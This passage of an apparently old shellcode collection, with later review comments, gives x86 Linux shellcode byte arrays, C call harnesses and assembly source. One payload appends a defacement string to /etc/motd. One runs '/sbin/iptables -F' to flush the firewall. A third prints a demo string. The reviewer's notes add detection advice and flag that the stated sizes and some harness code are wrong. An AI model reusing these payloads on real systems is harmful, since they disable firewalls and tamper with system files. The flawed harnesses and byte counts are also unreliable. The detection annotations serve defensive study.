 * Detection note: the observable effect is an append to /etc/motd by a
 * process that has no business touching it — file-integrity monitoring on
 * /etc catches it regardless of how the path is spelled.
 */
char shellcode[] =

/*fd = open("/etc////motd", O_WRONLY | O_APPEND); */
"\x31\xc0" // xorl %eax,%eax
"\x31\xc9" // xorl %ecx,%ecx
"\xb0\x05" // movb $0x5,%al      5 = open
"\x66\xb9\x01\x04" // movw $0x401,%cx   O_WRONLY | O_APPEND
"\x31\xd2" // xorl %edx,%edx     mode = 0
"\x52" // pushl %edx             NUL terminator
"\x68\x6d\x6f\x74\x64" // pushl $0x64746f6d   "motd"
"\x68\x2f\x2f\x2f\x2f" // pushl $0x2f2f2f2f   "////"
"\x68\x2f\x65\x74\x63" // pushl $0x6374652f   "/etc"
"\x8d\x1c\x24" // leal (%esp),%ebx   path
"\xcd\x80" // int $0x80

/* write(fd, "unl0ck rulez!!!\n",16); */
"\x89\xc3" // movl %eax,%ebx     fd from open()
"\x31\xc0" // xorl %eax,%eax
"\xb2\x10" // movb $0x10,%dl     count = 16
"\xb0\x04" // movb $0x4,%al      4 = write
"\x51" // pushl %ecx             %ecx still holds 0x401; pushed as filler after the text
"\x68\x21\x21\x21\x0a" // pushl $0x0a212121   "!!!\n"
"\x68\x75\x6c\x65\x7a" // pushl $0x7a656c75   "ulez"
"\x68\x63\x6b\x20\x72" // pushl $0x72206b63   "ck r"
"\x68\x75\x6e\x6c\x30" // pushl $0x306c6e75   "unl0"
"\x8d\x0c\x24" // leal (%esp),%ecx   buf
"\xcd\x80" // int $0x80

/* exit(%ebx) */
"\x31\xc0" // xorl %eax,%eax
"\xb0\x01" // movb $0x1,%al      1 = exit
"\xcd\x80"; // int $0x80

/*
 * Harness: prints strlen(shellcode) and calls into the .data array.
 * NOTE(review): as printed, this function has no closing brace, and neither
 * <stdio.h> nor <string.h> is included in this listing; `%u` with a size_t
 * argument is also a format mismatch.  The cast-as-lvalue is a removed GCC
 * extension and the call needs an executable data mapping.
 */
int main(void)
{
void (*funct) ();
(long) funct = &shellcode; /* cast-as-lvalue: non-standard GCC extension */
printf("strlen(shellcode): %u\n", strlen(shellcode));
funct(); /* control transfers into writable data; closing brace missing in the original */
----------------------------
b)fun2 shellcode
Size:36 byte
Description: shellcode that writes "unl0ck was here" to stdout
Code:

#include <stdio.h>

/*
 * 4b (other): write(1, "unl0ck was here\n", 16) -> exit().  Harmless demo
 * of the push-the-string-then-syscall pattern used by the other payloads.
 * NOTE(review): the hex below totals 41 bytes, not the 36 stated in the
 * heading.
 */
char
shellcode[]=

// write(stdout,"unl0ck was here\n", 16);
"\x31\xc0" // xor %eax,%eax
"\x31\xdb" // xor %ebx,%ebx
"\x31\xd2" // xor %edx,%edx
"\x68\x65\x72\x65\x0a" // push $0xa657265    "ere\n"
"\x68\x61\x73\x20\x68" // push $0x68207361   "as h"
"\x68\x63\x6b\x20\x77" // push $0x77206b63   "ck w"
"\x68\x75\x6e\x6c\x30" // push $0x306c6e75   "unl0"
"\x89\xe1" // mov %esp,%ecx      buf
"\xb2\x10" // mov $0x10,%dl      count = 16
"\x43"// inc %ebx               fd 1 = stdout
"\xb0\x04" // mov $0x4,%al       4 = write
"\xcd\x80" // int $0x80
"\x31\xc0" // xor %eax,%eax

// exit;
"\xb0\x01" // mov $0x1,%al       1 = exit
"\xcd\x80"; // int $0x80

/*
 * Harness: cast-as-lvalue assignment (removed GCC extension, not valid C)
 * followed by a call into the .data array, which needs an executable data
 * mapping.
 */
int
main()
{
void (*funct) ();
(long) funct = &shellcode; /* cast-as-lvalue: non-standard GCC extension */
funct(); /* control transfers into writable data */
}

----------------------------
c) "flush" shellcode
Size: 61 byte
Description: shellcode that runs /sbin/iptables --flush
Code:


/*
 * 4c (other): fork(); the child execve()s "///sbin/iptables" with the
 * argument "-F" (pushw $0x462d is the two-byte string "-F", i.e. --flush),
 * the parent jumps to WAIT and does waitpid (syscall 7) on it; asm_code()
 * below is the author's source.  As in 1b the array is named `main`,
 * presumably so the entry symbol resolves to the data itself.  69 bytes by
 * count of the hex below (the heading says 61).
 * Detection note: a firewall flush issued by anything other than the host's
 * own firewall management is a high-value alert; the leading triple slash is
 * NUL-avoidance padding that path matchers should canonicalise.
 */
char
main[] =
"\x31\xc0\x31\xdb\xb0\x02\xcd\x80" /* fork() */
"\x39\xd8\x75\x2d\x31\xc0\x50\x66" /* parent: jne WAIT; child: push NUL, pushw ... */
"\x68\x2d\x46\x89\xe6\x50\x68\x62" /* ... "-F" -> %esi; push NUL; path pushes ... */
"\x6c\x65\x73\x68\x69\x70\x74\x61"
"\x68\x62\x69\x6e\x2f\x68\x2f\x2f"
"\x2f\x73\x89\xe3\x8d\x54\x24\x10" /* ... "///sbin/iptables" -> %ebx; envp = &NUL */
"\x50\x56\x54\x89\xe1\xb0\x0b\xcd" /* argv = [.., "-F", NULL]; execve */
"\x80\x89\xc3\x31\xc0\x31\xc9\x31" /* WAIT: %ebx = child pid */
"\xd2\xb0\x07\xcd\x80"; /* waitpid(pid, NULL, 0) */

/* your evil shellcode here */

/*
 * Author's assembly source for the iptables blob above (multi-line string
 * literal, not accepted by current compilers — documentation only).  Child
 * path: build "-F" and "///sbin/iptables" on the stack, execve; parent path
 * (WAIT): waitpid on the child with %ecx = status pointer 0 and %edx =
 * options 0.
 */
int
asm_code()
{
__asm("
xorl %eax,%eax
xorl %ebx,%ebx
movb $2, %al
int $0x080
cmpl %ebx,%eax
jne WAIT

xorl %eax,%eax
pushl %eax
pushw $0x462d
movl %esp,%esi
pushl %eax
pushl $0x73656c62
pushl $0x61747069
pushl $0x2f6e6962
pushl $0x732f2f2f
movl %esp,%ebx
leal 0x10(%esp),%edx
pushl %eax
pushl %esi
pushl %esp
movl %esp,%ecx
movb $0xb,%al
int $0x80

WAIT:
movl %eax, %ebx
xorl %eax, %eax
xorl %ecx, %ecx
xorl %edx, %edx
movb $7, %al
int $0x80
");


}


